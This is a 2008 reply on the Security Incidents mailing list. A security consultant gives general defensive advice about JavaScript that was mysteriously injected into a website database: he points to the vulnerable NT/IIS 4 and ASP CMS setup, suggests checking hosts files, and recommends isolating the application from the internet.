Security Incidents mailing list archives

RE: eSafe quarantine: Re: Mysterious JavaScript appearance in website database

From: "Boaz Shunami" <BoazS () comsecglobal com>
Date: Tue, 15 Apr 2008 09:09:36 +0300

Hi Glenn,

Looks like it can be any number of attack vectors.

Your infrastructures are highly vulnerable (NT and IIS 4) and may
contain lots of vulnerabilities you're not aware of. Moreover, your
custom developed CMS which is probably ASP based may have application
security vulnerabilities. Have you tried to search your user's computers
hosts files for this domain (this may prove as an interesting attack
vector). I would highly recommend segregating this application and its
infrastructure from the internet (If possible).

Best Regards,

Boaz Shunami

Comsec Consulting